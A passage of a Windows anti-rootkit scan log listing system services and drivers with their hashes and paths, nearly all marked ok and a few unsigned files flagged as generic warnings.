00:53:23.0142 4376	HdAudAddService - ok
00:53:23.0267 4376	HDAudBus (062452b7ffd68c8c042a6261fe8dff4a) C:\Windows\system32\DRIVERS\HDAudBus.sys
00:53:23.0329 4376	HDAudBus - ok
00:53:23.0360 4376	HidBth (1338520e78d90154ed6be8f84de5fceb) C:\Windows\system32\drivers\hidbth.sys
00:53:23.0407 4376	HidBth - ok
00:53:23.0454 4376	HidIr (ff3160c3a2445128c5a6d9b076da519e) C:\Windows\system32\drivers\hidir.sys
00:53:23.0516 4376	HidIr - ok
00:53:23.0594 4376	hidserv (84067081f3318162797385e11a8f0582) C:\Windows\System32\hidserv.dll
00:53:23.0610 4376	hidserv - ok
00:53:23.0719 4376	HidUsb (cca4b519b17e23a00b826c55716809cc) C:\Windows\system32\DRIVERS\hidusb.sys
00:53:23.0735 4376	HidUsb - ok
00:53:23.0891 4376	hkmsvc (d8ad255b37da92434c26e4876db7d418) C:\Windows\system32\kmsvc.dll
00:53:23.0922 4376	hkmsvc - ok
00:53:24.0047 4376	HpCISSs (df353b401001246853763c4b7aaa6f50) C:\Windows\system32\drivers\hpcisss.sys
00:53:24.0062 4376	HpCISSs - ok
00:53:24.0203 4376	HTTP (f870aa3e254628ebeafe754108d664de) C:\Windows\system32\drivers\HTTP.sys
00:53:24.0265 4376	HTTP - ok
00:53:24.0343 4376	i2omp (324c2152ff2c61abae92d09f3cca4d63) C:\Windows\system32\drivers\i2omp.sys
00:53:24.0359 4376	i2omp - ok
00:53:24.0593 4376	i8042prt (22d56c8184586b7a1f6fa60be5f5a2bd) C:\Windows\system32\DRIVERS\i8042prt.sys
00:53:24.0608 4376	i8042prt - ok
00:53:24.0733 4376	iaStorV (c957bf4b5d80b46c5017bf0101e6c906) C:\Windows\system32\drivers\iastorv.sys
00:53:24.0749 4376	iaStorV - ok
00:53:25.0482 4376	IDriverT (6f95324909b502e2651442c1548ab12f) C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
00:53:25.0513 4376	IDriverT ( UnsignedFile.Multi.Generic ) - warning
00:53:25.0513 4376	IDriverT - detected UnsignedFile.Multi.Generic (1)
00:53:26.0605 4376	idsvc (98477b08e61945f974ed9fdc4cb6bdab) C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
00:53:26.0652 4376	idsvc - ok
00:53:26.0995 4376	iirsp (2d077bf86e843f901d8db709c95b49a5) C:\Windows\system32\drivers\iirsp.sys
00:53:27.0011 4376	iirsp - ok
00:53:27.0151 4376	IKEEXT (9908d8a397b76cd8d31d0d383c5773c9) C:\Windows\System32\ikeext.dll
00:53:27.0198 4376	IKEEXT - ok
00:53:27.0416 4376	IntcAzAudAddService (7bd4e0428776d11c8e8e26f9f5508690) C:\Windows\system32\drivers\RTKVHDA.sys
00:53:27.0744 4376	IntcAzAudAddService - ok
00:53:28.0071 4376	intelide (97469037714070e45194ed318d636401) C:\Windows\system32\drivers\intelide.sys
00:53:28.0103 4376	intelide - ok
00:53:28.0134 4376	intelppm (ce44cc04262f28216dd4341e9e36a16f) C:\Windows\system32\DRIVERS\intelppm.sys
00:53:28.0196 4376	intelppm - ok
00:53:28.0274 4376	IPBusEnum (9ac218c6e6105477484c6fdbe7d409a4) C:\Windows\system32\ipbusenum.dll
00:53:28.0305 4376	IPBusEnum - ok
00:53:28.0430 4376	IpFilterDriver (62c265c38769b864cb25b4bcf62df6c3) C:\Windows\system32\DRIVERS\ipfltdrv.sys
00:53:28.0461 4376	IpFilterDriver - ok
00:53:28.0586 4376	iphlpsvc (1998bd97f950680bb55f55a7244679c2) C:\Windows\System32\iphlpsvc.dll
00:53:28.0633 4376	iphlpsvc - ok
00:53:28.0649 4376	IpInIp - ok
00:53:28.0680 4376	IPMIDRV (40f34f8aba2a015d780e4b09138b6c17) C:\Windows\system32\drivers\ipmidrv.sys
00:53:28.0742 4376	IPMIDRV - ok
00:53:28.0805 4376	IPNAT (8793643a67b42cec66490b2a0cf92d68) C:\Windows\system32\DRIVERS\ipnat.sys
00:53:28.0836 4376	IPNAT - ok
00:53:29.0039 4376	iPod Service (57edb35ea2feca88f8b17c0c095c9a56) C:\Program Files\iPod\bin\iPodService.exe
00:53:29.0101 4376	iPod Service - ok
00:53:29.0210 4376	IRENUM (109c0dfb82c3632fbd11949b73aeeac9) C:\Windows\system32\drivers\irenum.sys
00:53:29.0273 4376	IRENUM - ok
00:53:29.0475 4376	isapnp (350fca7e73cf65bcef43fae1e4e91293) C:\Windows\system32\drivers\isapnp.sys
00:53:29.0491 4376	isapnp - ok
00:53:29.0616 4376	iScsiPrt (232fa340531d940aac623b121a595034) C:\Windows\system32\DRIVERS\msiscsi.sys
00:53:29.0631 4376	iScsiPrt - ok
00:53:29.0663 4376	iteatapi (bced60d16156e428f8df8cf27b0df150) C:\Windows\system32\drivers\iteatapi.sys
00:53:29.0678 4376	iteatapi - ok
00:53:29.0725 4376	iteraid (06fa654504a498c30adca8bec4e87e7e) C:\Windows\system32\drivers\iteraid.sys
00:53:29.0741 4376	iteraid - ok
00:53:29.0803 4376	kbdclass (37605e0a8cf00cbba538e753e4344c6e) C:\Windows\system32\DRIVERS\kbdclass.sys
00:53:29.0819 4376	kbdclass - ok
00:53:29.0975 4376	kbdhid (ede59ec70e25c24581add1fbec7325f7) C:\Windows\system32\DRIVERS\kbdhid.sys
00:53:30.0006 4376	kbdhid - ok
00:53:30.0068 4376	KeyIso (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
00:53:30.0115 4376	KeyIso - ok
00:53:30.0193 4376	KR10I (1e0d65f7ffeb4e99b2eec1ccb5754cc8) C:\Windows\system32\drivers\kr10i.sys
00:53:30.0287 4376	KR10I ( UnsignedFile.Multi.Generic ) - warning
00:53:30.0287 4376	KR10I - detected UnsignedFile.Multi.Generic (1)
00:53:30.0333 4376	KR10N (a1963360e74931222a67356c8ad48378) C:\Windows\system32\drivers\kr10n.sys
00:53:30.0411 4376	KR10N ( UnsignedFile.Multi.Generic ) - warning
00:53:30.0411 4376	KR10N - detected UnsignedFile.Multi.Generic (1)
00:53:30.0474 4376	KR3NPXP (485e005cd51ff502fb16483eb4b69c17) C:\Windows\system32\drivers\kr3npxp.sys
00:53:30.0661 4376	KR3NPXP ( UnsignedFile.Multi.Generic ) - warning
00:53:30.0661 4376	KR3NPXP - detected UnsignedFile.Multi.Generic (1)
00:53:30.0801 4376	KSecDD (2b2f1638466e8cb091400c9019cc730e) C:\Windows\system32\Drivers\ksecdd.sys
00:53:30.0833 4376	KSecDD - ok
00:53:31.0035 4376	KtmRm (8078f8f8f7a79e2e6b494523a828c585) C:\Windows\system32\msdtckrm.dll
00:53:31.0098 4376	KtmRm - ok
00:53:31.0254 4376	LanmanServer (1bf5eebfd518dd7298434d8c862f825d) C:\Windows\System32\srvsvc.dll
00:53:31.0285 4376	LanmanServer - ok
00:53:31.0441 4376	LanmanWorkstation (1db69705b695b987082c8baec0c6b34f) C:\Windows\System32\wkssvc.dll
00:53:31.0472 4376	LanmanWorkstation - ok
00:53:31.0597 4376	lltdio (d1c5883087a0c3f1344d9d55a44901f6) C:\Windows\system32\DRIVERS\lltdio.sys
00:53:31.0628 4376	lltdio - ok
00:53:31.0784 4376	lltdsvc (2d5a428872f1442631d0959a34abff63) C:\Windows\System32\lltdsvc.dll
00:53:31.0815 4376	lltdsvc - ok
00:53:32.0049 4376	lmhosts (35d40113e4a5b961b6ce5c5857702518) C:\Windows\System32\lmhsvc.dll
00:53:32.0096 4376	lmhosts - ok
00:53:32.0143 4376	LPCFilter (515fc18cabee0158a324b08b1c2667cf) C:\Windows\system32\DRIVERS\LPCFilter.sys
00:53:32.0174 4376	LPCFilter - ok
00:53:32.0346 4376	LSI_FC (a2262fb9f28935e862b4db46438c80d2) C:\Windows\system32\drivers\lsi_fc.sys
00:53:32.0361 4376	LSI_FC - ok
00:53:32.0393 4376	LSI_SAS (30d73327d390f72a62f32c103daf1d6d) C:\Windows\system32\drivers\lsi_sas.sys
00:53:32.0408 4376	LSI_SAS - ok
00:53:32.0580 4376	LSI_SCSI (e1e36fefd45849a95f1ab81de0159fe3) C:\Windows\system32\drivers\lsi_scsi.sys
00:53:32.0595 4376	LSI_SCSI - ok
00:53:32.0705 4376	luafv (8f5c7426567798e62a3b3614965d62cc) C:\Windows\system32\drivers\luafv.sys
00:53:32.0736 4376	luafv - ok
00:53:32.0970 4376	McAfee SiteAdvisor Service (6c3d154fff0a97a6c3d9f78d60c41655) c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
00:53:32.0985 4376	McAfee SiteAdvisor Service - ok
00:53:33.0095 4376	Mcx2Svc (aef9babb8a506bc4ce0451a64aaded46) C:\Windows\system32\Mcx2Svc.dll
00:53:33.0110 4376	Mcx2Svc - ok
00:53:33.0282 4376	MDM (11f714f85530a2bd134074dc30e99fca) C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
00:53:33.0297 4376	MDM - ok
00:53:33.0360 4376	megasas (d153b14fc6598eae8422a2037553adce) C:\Windows\system32\drivers\megasas.sys
00:53:33.0375 4376	megasas - ok
00:53:33.0469 4376	MMCSS (1076ffcffaae8385fd62dfcb25ac4708) C:\Windows\system32\mmcss.dll
00:53:33.0500 4376	MMCSS - ok
00:53:33.0594 4376	Modem (e13b5ea0f51ba5b1512ec671393d09ba) C:\Windows\system32\drivers\modem.sys
00:53:33.0656 4376	Modem - ok
00:53:33.0828 4376	monitor (0a9bb33b56e294f686abb7c1e4e2d8a8) C:\Windows\system32\DRIVERS\monitor.sys
00:53:33.0859 4376	monitor - ok
00:53:33.0953 4376	mouclass (5bf6a1326a335c5298477754a506d263) C:\Windows\system32\DRIVERS\mouclass.sys
00:53:33.0968 4376	mouclass - ok
00:53:33.0984 4376	mouhid (93b8d4869e12cfbe663915502900876f) C:\Windows\system32\DRIVERS\mouhid.sys
00:53:34.0015 4376	mouhid - ok
00:53:34.0062 4376	MountMgr (bdafc88aa6b92f7842416ea6a48e1600) C:\Windows\system32\drivers\mountmgr.sys
00:53:34.0077 4376	MountMgr - ok
00:53:34.0202 4376	MpFilter (d993bea500e7382dc4e760bf4f35efcb) C:\Windows\system32\DRIVERS\MpFilter.sys
00:53:34.0218 4376	MpFilter - ok
00:53:34.0265 4376	mpio (583a41f26278d9e0ea548163d6139397) C:\Windows\system32\drivers\mpio.sys
00:53:34.0280 4376	mpio - ok
00:53:34.0530 4376	MpKsl969ad15c (a69630d039c38018689190234f866d77) c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{50C28A22-B3EC-472C-BB7F-F841BF47E300}\MpKsl969ad15c.sys
00:53:34.0545 4376	MpKsl969ad15c - ok
00:53:34.0639 4376	mpsdrv (22241feba9b2defa669c8cb0a8dd7d2e) C:\Windows\system32\drivers\mpsdrv.sys
00:53:34.0670 4376	mpsdrv - ok
00:53:34.0779 4376	MpsSvc (5de62c6e9108f14f6794060a9bdecaec) C:\Windows\system32\mpssvc.dll
00:53:34.0842 4376	MpsSvc - ok
00:53:34.0935 4376	Mraid35x (4fbbb70d30fd20ec51f80061703b001e) C:\Windows\system32\drivers\mraid35x.sys
00:53:34.0951 4376	Mraid35x - ok
00:53:35.0060 4376	MRxDAV (82cea0395524aacfeb58ba1448e8325c) C:\Windows\system32\drivers\mrxdav.sys
00:53:35.0076 4376	MRxDAV - ok
00:53:35.0169 4376	mrxsmb (1e94971c4b446ab2290deb71d01cf0c2) C:\Windows\system32\DRIVERS\mrxsmb.sys
00:53:35.0201 4376	mrxsmb - ok
00:53:35.0325 4376	mrxsmb10 (4fccb34d793b116423209c0f8b7a3b03) C:\Windows\system32\DRIVERS\mrxsmb10.sys
00:53:35.0341 4376	mrxsmb10 - ok
00:53:35.0357 4376	mrxsmb20 (c3cb1b40ad4a0124d617a1199b0b9d7c) C:\Windows\system32\DRIVERS\mrxsmb20.sys
00:53:35.0372 4376	mrxsmb20 - ok
00:53:35.0419 4376	msahci (742aed7939e734c36b7e8d6228ce26b7) C:\Windows\system32\drivers\msahci.sys
00:53:35.0435 4376	msahci - ok
00:53:35.0450 4376	msdsm (3fc82a2ae4cc149165a94699183d3028) C:\Windows\system32\drivers\msdsm.sys
00:53:35.0466 4376	msdsm - ok
00:53:35.0544 4376	MSDTC (fd7520cc3a80c5fc8c48852bb24c6ded) C:\Windows\System32\msdtc.exe
00:53:35.0575 4376	MSDTC - ok
00:53:35.0747 4376	Msfs (a9927f4a46b816c92f461acb90cf8515) C:\Windows\system32\drivers\Msfs.sys
00:53:35.0809 4376	Msfs - ok
00:53:35.0981 4376	msisadrv (0f400e306f385c56317357d6dea56f62) C:\Windows\system32\drivers\msisadrv.sys
00:53:35.0996 4376	msisadrv - ok
00:53:36.0215 4376	MSiSCSI (85466c0757a23d9a9aecdc0755203cb2) C:\Windows\system32\iscsiexe.dll
00:53:36.0246 4376	MSiSCSI - ok
00:53:36.0261 4376	msiserver - ok
00:53:36.0324 4376	MSKSSRV (d8c63d34d9c9e56c059e24ec7185cc07) C:\Windows\system32\drivers\MSKSSRV.sys
00:53:36.0355 4376	MSKSSRV - ok
00:53:36.0527 4376	MsMpSvc (24516bf4e12a46cb67302e2cdcb8cddf) c:\Program Files\Microsoft Security Client\MsMpEng.exe
00:53:36.0542 4376	MsMpSvc - ok
00:53:36.0573 4376	MSPCLOCK (1d373c90d62ddb641d50e55b9e78d65e) C:\Windows\system32\drivers\MSPCLOCK.sys
00:53:36.0605 4376	MSPCLOCK - ok
00:53:36.0620 4376	MSPQM (b572da05bf4e098d4bba3a4734fb505b) C:\Windows\system32\drivers\MSPQM.sys
00:53:36.0651 4376	MSPQM - ok
00:53:36.0745 4376	MsRPC (b49456d70555de905c311bcda6ec6adb) C:\Windows\system32\drivers\MsRPC.sys
00:53:36.0776 4376	MsRPC - ok
00:53:36.0901 4376	mssmbios (e384487cb84be41d09711c30ca79646c) C:\Windows\system32\DRIVERS\mssmbios.sys
00:53:36.0917 4376	mssmbios - ok
00:53:36.0963 4376	MSTEE (7199c1eec1e4993caf96b8c0a26bd58a) C:\Windows\system32\drivers\MSTEE.sys
00:53:36.0995 4376	MSTEE - ok
00:53:37.0088 4376	Mup (6a57b5733d4cb702c8ea4542e836b96c) C:\Windows\system32\Drivers\mup.sys
00:53:37.0119 4376	Mup - ok
00:53:37.0291 4376	napagent (e4eaf0c5c1b41b5c83386cf212ca9584) C:\Windows\system32\qagentRT.dll
00:53:37.0353 4376	napagent - ok
00:53:37.0431 4376	NativeWifiP (85c44fdff9cf7e72a40dcb7ec06a4416) C:\Windows\system32\DRIVERS\nwifi.sys
00:53:37.0447 4376	NativeWifiP - ok
00:53:37.0509 4376	NCHSSVAD (0df9cc7b5cc173f545723f23e68fac93) C:\Windows\system32\drivers\nchssvad.sys
00:53:37.0525 4376	NCHSSVAD ( UnsignedFile.Multi.Generic ) - warning
00:53:37.0525 4376	NCHSSVAD - detected UnsignedFile.Multi.Generic (1)
00:53:37.0697 4376	NDIS (1357274d1883f68300aeadd15d7bbb42) C:\Windows\system32\drivers\ndis.sys
00:53:37.0743 4376	NDIS - ok
00:53:37.0931 4376	NdisTapi (0e186e90404980569fb449ba7519ae61) C:\Windows\system32\DRIVERS\ndistapi.sys
00:53:37.0946 4376	NdisTapi - ok
00:53:38.0009 4376	Ndisuio (d6973aa34c4d5d76c0430b181c3cd389) C:\Windows\system32\DRIVERS\ndisuio.sys
00:53:38.0040 4376	Ndisuio - ok
00:53:38.0149 4376	NdisWan (818f648618ae34f729fdb47ec68345c3) C:\Windows\system32\DRIVERS\ndiswan.sys
00:53:38.0180 4376	NdisWan - ok
00:53:38.0227 4376	NDProxy (71dab552b41936358f3b541ae5997fb3) C:\Windows\system32\drivers\NDProxy.sys
00:53:38.0243 4376	NDProxy - ok
00:53:38.0258 4376	NetBIOS (bcd093a5a6777cf626434568dc7dba78) C:\Windows\system32\DRIVERS\netbios.sys
00:53:38.0305 4376	NetBIOS - ok
00:53:38.0461 4376	netbt (ecd64230a59cbd93c85f1cd1cab9f3f6) C:\Windows\system32\DRIVERS\netbt.sys
00:53:38.0492 4376	netbt - ok
00:53:38.0695 4376	Netlogon (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
00:53:38.0711 4376	Netlogon - ok
00:53:38.0867 4376	Netman (c8052711daecc48b982434c5116ca401) C:\Windows\System32\netman.dll
00:53:38.0898 4376	Netman - ok
00:53:38.0991 4376	netprofm (2ef3bbe22e5a5acd1428ee387a0d0172) C:\Windows\System32\netprofm.dll
00:53:39.0023 4376	netprofm - ok
00:53:39.0179 4376	NetTcpPortSharing (d6c4e4a39a36029ac0813d476fbd0248) C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
00:53:39.0194 4376	NetTcpPortSharing - ok
00:53:39.0288 4376	nfrd960 (2e7fb731d4790a1bc6270accefacb36e) C:\Windows\system32\drivers\nfrd960.sys
00:53:39.0303 4376	nfrd960 - ok
00:53:39.0350 4376	NisDrv (b52f26bade7d7e4a79706e3fd91834cd) C:\Windows\system32\DRIVERS\NisDrvWFP.sys
00:53:39.0366 4376	NisDrv - ok
00:53:39.0475 4376	NisSrv (290c0d4c4889398797f8df3be00b9698) c:\Program Files\Microsoft Security Client\NisSrv.exe
00:53:39.0615 4376	NisSrv - ok
00:53:39.0756 4376	NlaSvc (2997b15415f9bbe05b5a4c1c85e0c6a2) C:\Windows\System32\nlasvc.dll
00:53:39.0787 4376	NlaSvc - ok
00:53:39.0927 4376	Npfs (d36f239d7cce1931598e8fb90a0dbc26) C:\Windows\system32\drivers\Npfs.sys
00:53:39.0943 4376	Npfs - ok
00:53:40.0083 4376	nsi (8bb86f0c7eea2bded6fe095d0b4ca9bd) C:\Windows\system32\nsisvc.dll
00:53:40.0115 4376	nsi - ok
00:53:40.0146 4376	nsiproxy (609773e344a97410ce4ebf74a8914fcf) C:\Windows\system32\drivers\nsiproxy.sys
00:53:40.0177 4376	nsiproxy - ok
00:53:40.0427 4376	Ntfs (6a4a98cee84cf9e99564510dda4baa47) C:\Windows\system32\drivers\Ntfs.sys
00:53:40.0536 4376	Ntfs - ok
00:53:40.0645 4376	ntrigdigi (e875c093aec0c978a90f30c9e0dfbb72) C:\Windows\system32\drivers\ntrigdigi.sys
00:53:40.0707 4376	ntrigdigi - ok
00:53:40.0785 4376	Null (c5dbbcda07d780bda9b685df333bb41e) C:\Windows\system32\drivers\Null.sys
00:53:40.0817 4376	Null - ok
00:53:40.0895 4376	nvraid (e69e946f80c1c31c53003bfbf50cbb7c) C:\Windows\system32\drivers\nvraid.sys
00:53:40.0910 4376	nvraid - ok
00:53:40.0941 4376	nvstor (9e0ba19a28c498a6d323d065db76dffc) C:\Windows\system32\drivers\nvstor.sys
00:53:40.0957 4376	nvstor - ok
00:53:41.0004 4376	nv_agp (07c186427eb8fcc3d8d7927187f260f7) C:\Windows\system32\drivers\nv_agp.sys
00:53:41.0019 4376	nv_agp - ok
00:53:41.0035 4376	NwlnkFlt - ok
00:53:41.0035 4376	NwlnkFwd - ok
00:53:41.0160 4376	ohci1394 (6f310e890d46e246e0e261a63d9b36b4) C:\Windows\system32\DRIVERS\ohci1394.sys
00:53:41.0191 4376	ohci1394 - ok
00:53:41.0425 4376	p2pimsvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
00:53:41.0550 4376	p2pimsvc - ok
00:53:41.0550 4376	p2psvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
00:53:41.0612 4376	p2psvc - ok
00:53:41.0753 4376	Parport (0fa9b5055484649d63c303fe404e5f4d) C:\Windows\system32\drivers\parport.sys
00:53:41.0799 4376	Parport - ok
00:53:41.0862 4376	partmgr (b9c2b89f08670e159f7181891e449cd9) C:\Windows\system32\drivers\partmgr.sys
00:53:41.0877 4376	partmgr - ok
00:53:41.0893 4376	Parvdm (4f9a6a8a31413180d0fcb279ad5d8112) C:\Windows\system32\drivers\parvdm.sys
00:53:41.0971 4376	Parvdm - ok
00:53:42.0033 4376	PcaSvc (c6276ad11f4bb49b58aa1ed88537f14a) C:\Windows\System32\pcasvc.dll
00:53:42.0065 4376	PcaSvc - ok
00:53:42.0158 4376	pci (941dc1d19e7e8620f40bbc206981efdb) C:\Windows\system32\drivers\pci.sys
00:53:42.0174 4376	pci - ok
00:53:42.0189 4376	pciide (1636d43f10416aeb483bc6001097b26c) C:\Windows\system32\drivers\pciide.sys
00:53:42.0205 4376	pciide - ok
00:53:42.0283 4376	pcmcia (3bb2244f343b610c29c98035504c9b75) C:\Windows\system32\DRIVERS\pcmcia.sys
00:53:42.0299 4376	pcmcia - ok
00:53:42.0455 4376	pcouffin (5b6c11de7e839c05248ced8825470fef) C:\Windows\system32\Drivers\pcouffin.sys
00:53:42.0486 4376	pcouffin - ok
00:53:42.0657 4376	PEAUTH (6349f6ed9c623b44b52ea3c63c831a92) C:\Windows\system32\drivers\peauth.sys
00:53:42.0767 4376	PEAUTH - ok
00:53:42.0907 4376	pinger (6dbf2ac2bdaff355995ab25eccc4cfe1) C:\Toshiba\IVP\ISM\pinger.exe
00:53:43.0110 4376	pinger - ok
00:53:43.0344 4376	pla (b1689df169143f57053f795390c99db3) C:\Windows\system32\pla.dll
00:53:43.0500 4376	pla - ok
00:53:44.0061 4376	PlugPlay (c5e7f8a996ec0a82d508fd9064a5569e) C:\Windows\system32\umpnpmgr.dll
00:53:44.0108 4376	PlugPlay - ok
00:53:44.0264 4376	PNRPAutoReg (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
00:53:44.0342 4376	PNRPAutoReg - ok
00:53:44.0342 4376	PNRPsvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
00:53:44.0436 4376	PNRPsvc - ok
00:53:44.0623 4376	PolicyAgent (d0494460421a03cd5225cca0059aa146) C:\Windows\System32\ipsecsvc.dll
00:53:44.0654 4376	PolicyAgent - ok
00:53:44.0795 4376	PptpMiniport (ecfffaec0c1ecd8dbc77f39070ea1db1) C:\Windows\system32\DRIVERS\raspptp.sys
00:53:44.0826 4376	PptpMiniport - ok
00:53:45.0013 4376	Processor (0e3cef5d28b40cf273281d620c50700a) C:\Windows\system32\drivers\processr.sys
00:53:45.0075 4376	Processor - ok
00:53:45.0185 4376	ProfSvc (0508faa222d28835310b7bfca7a77346) C:\Windows\system32\profsvc.dll
00:53:45.0216 4376	ProfSvc - ok
00:53:45.0294 4376	ProtectedStorage (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
00:53:45.0309 4376	ProtectedStorage - ok
00:53:45.0450 4376	PSched (99514faa8df93d34b5589187db3aa0ba) C:\Windows\system32\DRIVERS\pacer.sys
00:53:45.0481 4376	PSched - ok
00:53:45.0824 4376	ql2300 (ccdac889326317792480c0a67156a1ec) C:\Windows\system32\drivers\ql2300.sys
00:53:45.0949 4376	ql2300 - ok
00:53:46.0074 4376	ql40xx (81a7e5c076e59995d54bc1ed3a16e60b) C:\Windows\system32\drivers\ql40xx.sys
00:53:46.0089 4376	ql40xx - ok
00:53:46.0230 4376	QWAVE (e9ecae663f47e6cb43962d18ab18890f) C:\Windows\system32\qwave.dll
00:53:46.0245 4376	QWAVE - ok
00:53:46.0308 4376	QWAVEdrv (9f5e0e1926014d17486901c88eca2db7) C:\Windows\system32\drivers\qwavedrv.sys
00:53:46.0323 4376	QWAVEdrv - ok
00:53:46.0386 4376	RasAcd (147d7f9c556d259924351feb0de606c3) C:\Windows\system32\DRIVERS\rasacd.sys
00:53:46.0417 4376	RasAcd - ok
00:53:46.0495 4376	RasAuto (f6a452eb4ceadbb51c9e0ee6b3ecef0f) C:\Windows\System32\rasauto.dll
00:53:46.0526 4376	RasAuto - ok
00:53:46.0651 4376	Rasl2tp (a214adbaf4cb47dd2728859ef31f26b0) C:\Windows\system32\DRIVERS\rasl2tp.sys
00:53:46.0682 4376	Rasl2tp - ok
00:53:46.0760 4376	RasMan (75d47445d70ca6f9f894b032fbc64fcf) C:\Windows\System32\rasmans.dll
00:53:46.0791 4376	RasMan - ok
00:53:46.0916 4376	RasPppoe (509a98dd18af4375e1fc40bc175f1def) C:\Windows\system32\DRIVERS\raspppoe.sys
00:53:46.0932 4376	RasPppoe - ok
00:53:46.0994 4376	RasSstp (2005f4a1e05fa09389ac85840f0a9e4d) C:\Windows\system32\DRIVERS\rassstp.sys
00:53:47.0010 4376	RasSstp - ok
00:53:47.0088 4376	rdbss (b14c9d5b9add2f84f70570bbbfaa7935) C:\Windows\system32\DRIVERS\rdbss.sys
00:53:47.0119 4376	rdbss - ok
00:53:47.0166 4376	RDPCDD (89e59be9a564262a3fb6c4f4f1cd9899) C:\Windows\system32\DRIVERS\RDPCDD.sys
00:53:47.0197 4376	RDPCDD - ok
00:53:47.0291 4376	rdpdr (e8bd98d46f2ed77132ba927fccb47d8b) C:\Windows\system32\drivers\rdpdr.sys
00:53:47.0447 4376	rdpdr - ok
00:53:47.0462 4376	RDPENCDD (9d91fe5286f748862ecffa05f8a0710c) C:\Windows\system32\drivers\rdpencdd.sys
00:53:47.0493 4376	RDPENCDD - ok
00:53:47.0712 4376	RDPWD (79c6df8477250f5c54f7c5ae1d6b814e) C:\Windows\system32\drivers\RDPWD.sys
00:53:47.0743 4376	RDPWD - ok
00:53:47.0821 4376	RemoteAccess (bcdd6b4804d06b1f7ebf29e53a57ece9) C:\Windows\System32\mprdim.dll
00:53:47.0852 4376	RemoteAccess - ok
00:53:48.0071 4376	RemoteRegistry (9e6894ea18daff37b63e1005f83ae4ab) C:\Windows\system32\regsvc.dll
00:53:48.0102 4376	RemoteRegistry - ok
00:53:48.0149 4376	RpcLocator (5123f83cbc4349d065534eeb6bbdc42b) C:\Windows\system32\locator.exe
00:53:48.0164 4376	RpcLocator - ok
00:53:48.0336 4376	RpcSs (3b5b4d53fec14f7476ca29a20cc31ac9) C:\Windows\system32\rpcss.dll
00:53:48.0398 4376	RpcSs - ok
00:53:48.0554 4376	rspndr (9c508f4074a39e8b4b31d27198146fad) C:\Windows\system32\DRIVERS\rspndr.sys
00:53:48.0601 4376	rspndr - ok
00:53:48.0632 4376	RTL8169 (5163f804256deb8cf1ef64b780a18caa) C:\Windows\system32\DRIVERS\Rtlh86.sys
00:53:48.0695 4376	RTL8169 - ok
00:53:48.0773 4376	SamSs (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
00:53:48.0788 4376	SamSs - ok
00:53:48.0929 4376	sbp2port (3ce8f073a557e172b330109436984e30) C:\Windows\system32\drivers\sbp2port.sys
00:53:48.0944 4376	sbp2port - ok
00:53:49.0038 4376	SCardSvr (77b7a11a0c3d78d3386398fbbea1b632) C:\Windows\System32\SCardSvr.dll
00:53:49.0085 4376	SCardSvr - ok
00:53:49.0256 4376	Schedule (1a58069db21d05eb2ab58ee5753ebe8d) C:\Windows\system32\schedsvc.dll
00:53:49.0319 4376	Schedule - ok
00:53:49.0397 4376	SCPolicySvc (312ec3e37a0a1f2006534913e37b4423) C:\Windows\System32\certprop.dll
00:53:49.0428 4376	SCPolicySvc - ok
00:53:49.0568 4376	sdbus (8f36b54688c31eed4580129040c6a3d3) C:\Windows\system32\DRIVERS\sdbus.sys
00:53:49.0584 4376	sdbus - ok
00:53:49.0646 4376	SDRSVC (716313d9f6b0529d03f726d5aaf6f191) C:\Windows\System32\SDRSVC.dll
00:53:49.0677 4376	SDRSVC - ok
00:53:49.0709 4376	secdrv (90a3935d05b494a5a39d37e71f09a677) C:\Windows\system32\drivers\secdrv.sys
00:53:49.0755 4376	secdrv - ok
00:53:49.0896 4376	seclogon (fd5199d4d8a521005e4b5ee7fe00fa9b) C:\Windows\system32\seclogon.dll
00:53:49.0943 4376	seclogon - ok
00:53:49.0974 4376	SENS (a9bbab5759771e523f55563d6cbe140f) C:\Windows\system32\sens.dll
00:53:50.0021 4376	SENS - ok
00:53:50.0036 4376	Serenum (68e44e331d46f0fb38f0863a84cd1a31) C:\Windows\system32\drivers\serenum.sys
00:53:50.0099 4376	Serenum - ok
00:53:50.0145 4376	Serial (c70d69a918b178d3c3b06339b40c2e1b) C:\Windows\system32\drivers\serial.sys
00:53:50.0208 4376	Serial - ok
00:53:50.0301 4376	sermouse (8af3d28a879bf75db53a0ee7a4289624) C:\Windows\system32\drivers\sermouse.sys
00:53:50.0333 4376	sermouse - ok
00:53:50.0613 4376	ServiceLayer (56eb980da71b94b79a341615c3c256cf) C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
00:53:50.0629 4376	ServiceLayer ( UnsignedFile.Multi.Generic ) - warning
00:53:50.0629 4376	ServiceLayer - detected UnsignedFile.Multi.Generic (1)
00:53:50.0723 4376	SessionEnv (d2193326f729b163125610dbf3e17d57) C:\Windows\system32\sessenv.dll
00:53:50.0785 4376	SessionEnv - ok
00:53:50.0816 4376	sffdisk (3efa810bdca87f6ecc24f9832243fe86) C:\Windows\system32\DRIVERS\sffdisk.sys
00:53:50.0847 4376	sffdisk - ok
00:53:50.0941 4376	sffp_mmc (8fd08a310645fe872eeec6e08c6bf3ee) C:\Windows\system32\drivers\sffp_mmc.sys
00:53:51.0003 4376	sffp_mmc - ok
00:53:51.0081 4376	sffp_sd (9f66a46c55d6f1ccabc79bb7afccc545) C:\Windows\system32\DRIVERS\sffp_sd.sys
00:53:51.0113 4376	sffp_sd - ok
00:53:51.0128 4376	sfloppy (46ed8e91793b2e6f848015445a0ac188) C:\Windows\system32\drivers\sfloppy.sys
00:53:51.0206 4376	sfloppy - ok
00:53:51.0300 4376	SharedAccess (e1499bd0ff76b1b2fbbf1af339d91165) C:\Windows\System32\ipnathlp.dll
